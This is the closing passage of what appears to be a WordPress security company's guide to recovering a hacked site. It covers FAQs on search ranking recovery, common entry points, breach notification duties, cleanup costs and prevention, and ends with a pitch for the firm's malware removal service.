Yes, in most cases, but the timeline depends on how long the infection was active and how severely Google reacted to it. Once your site is clean and you’ve submitted a review request through Google Search Console, rankings typically begin recovering within two to four weeks. Sites that were infected for months or that were used for serious spam campaigns may take longer to fully recover their search visibility.

How did my WordPress site get hacked?

The most common entry points for WordPress attacks are: outdated plugins or themes with known vulnerabilities, weak or reused passwords on admin accounts, nulled or pirated plugins and themes with pre-installed backdoors, insecure hosting environments with poor file permission configurations, and brute force attacks on the WordPress login page. Running a post-cleanup audit to identify which vulnerability was exploited is an important step that many site owners skip.

Do I need to notify my customers if my WordPress site was hacked?

This depends on what data your site holds and what the hackers accessed. If your site collects customer data (names, email addresses, payment information, or any other personally identifiable information) and there is any reason to believe that data was accessed or exfiltrated, you may have legal obligations to notify affected users depending on your jurisdiction. In the EU, the GDPR requires you to notify your supervisory authority within 72 hours of becoming aware of a breach that poses a risk to individuals, and to notify the affected individuals themselves without undue delay when the risk to them is high. In the US, notification requirements vary by state. When in doubt, consult a legal professional.

How much does WordPress malware removal cost?

DIY cleanup costs nothing in money but can cost significant time and carries the risk of incomplete cleanup. Professional WordPress malware removal services typically range from $150 to $500 or more depending on the severity of the infection and the size of the site. The investment is almost always worth it compared to the ongoing damage of a partially cleaned or reinfected site.

How can I prevent my WordPress site from getting hacked again?

The most effective prevention stack is: keep all software updated at all times, use strong unique passwords and two-factor authentication on all admin accounts, install a WordPress web application firewall, run automated malware scans on a regular schedule, and keep tested off-site backups. If you’re on a managed WordPress hosting plan that includes security monitoring and managed updates, the most common attack vectors are already covered for you.


The Bottom Line

A hacked WordPress site is a crisis, but it’s a manageable one if you respond quickly and systematically. Work through the steps in this guide in order, don’t skip the hardening phase after cleanup, and don’t restore from an old backup without also closing the vulnerability that let the attacker in.

If you’d rather have someone else handle it, that’s a smart call. The faster a WordPress hack is professionally cleaned, the less total damage it causes to your rankings, your visitors, and your reputation. Our WordPress malware removal service gets your site clean, protected, and back online as quickly as possible. Get in touch and we’ll get started right away.
